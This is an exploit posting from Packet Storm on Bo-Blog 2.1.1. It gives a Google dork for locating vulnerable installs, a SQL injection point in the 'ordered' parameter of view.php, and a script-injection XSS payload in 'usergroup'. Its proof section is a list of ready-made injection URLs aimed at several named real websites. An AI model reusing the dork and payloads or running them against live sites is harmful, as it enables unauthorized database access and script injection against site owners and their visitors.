what you don't know can hurt you

Bo-Blog 2.1.1 Cross Site Scripting / SQL Injection

Bo-Blog 2.1.1 Cross Site Scripting / SQL Injection
Posted Aug 20, 2013
Authored by Ashiyane Digital Security Team

Bo-Blog version 2.1.1 suffers from cross site scripting and remote SQL injection vulnerabilities. Note that this finding houses site-specific data.

tags | exploit, remote, vulnerability, xss, sql injection
MD5 | ad3a89139420c4fb38aad074bef3977f

Bo-Blog 2.1.1 Cross Site Scripting / SQL Injection

Change Mirror Download
# Exploit Title : Bo-Blog 2.1.1 Multiple Vulnerabilites
#****************************************************************************
# Exploit Author : Ashiyane Digital Security Team
#************************************************
# Official site : http://www.bo-blog.com/
# Tested on: Windows,Linux
#*************************
#
#///////////////////////////////////////////////
# Google Dork : intext:"Powered by Bo-Blog 2.1.1"
#///////////////////////////////////////////////
#
# Exploit 1 : Sql Injection
#
# Location : /view.php?go=userlist&ordered=1[Sql Injection]
#
#
# Proof:
#
# http://www.landsaywilson.com//view.php?go=userlist&ordered=1%27
#
# http://itaoblog.com/view.php?go=userlist&ordered=1%27
#
# http://www.landsaywilson.com//view.php?go=userlist&ordered=1%27
#
# http://www.9enjoy.com/view.php?go=userlist&ordered=1%27
#
# http://www.hongcn.com/en/view.php?go=userlist&ordered=1%27

-----------------------------------------------------------------------------

# Exploit 2 : Cross site scripting
#
# Location : /view.php?go=userlist&ordered=1&usergroup=[xss]
#
# Location : /blog//view.php?go=userlist&ordered=1&usergroup=[xss]
#
#
# Proof:
#
#
http://itaoblog.com/view.php?go=userlist&ordered=1&usergroup=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
#
# www.landsaywilson.com//view.php?go=userlist&ordered=1&usergroup=
"/><script>alert(1);</script>
#
#
http://www.boneboy.net/view.php?go=userlist&ordered=1&usergroup=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
#
#
http://itlife365.com/view.php?go=userlist&ordered=1&usergroup=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
#
#
http://www.hongcn.com/en/view.php?go=userlist&ordered=1&usergroup=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
##############--------
discovered by : ACC3SS
##############--------

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

February 2015

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Feb 1st
    2 Files
  • 2
    Feb 2nd
    17 Files
  • 3
    Feb 3rd
    15 Files
  • 4
    Feb 4th
    16 Files
  • 5
    Feb 5th
    14 Files
  • 6
    Feb 6th
    4 Files
  • 7
    Feb 7th
    0 Files
  • 8
    Feb 8th
    0 Files
  • 9
    Feb 9th
    0 Files
  • 10
    Feb 10th
    0 Files
  • 11
    Feb 11th
    0 Files
  • 12
    Feb 12th
    0 Files
  • 13
    Feb 13th
    0 Files
  • 14
    Feb 14th
    0 Files
  • 15
    Feb 15th
    0 Files
  • 16
    Feb 16th
    0 Files
  • 17
    Feb 17th
    0 Files
  • 18
    Feb 18th
    0 Files
  • 19
    Feb 19th
    0 Files
  • 20
    Feb 20th
    0 Files
  • 21
    Feb 21st
    0 Files
  • 22
    Feb 22nd
    0 Files
  • 23
    Feb 23rd
    0 Files
  • 24
    Feb 24th
    0 Files
  • 25
    Feb 25th
    0 Files
  • 26
    Feb 26th
    0 Files
  • 27
    Feb 27th
    0 Files
  • 28
    Feb 28th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2015 Packet Storm. All rights reserved.

close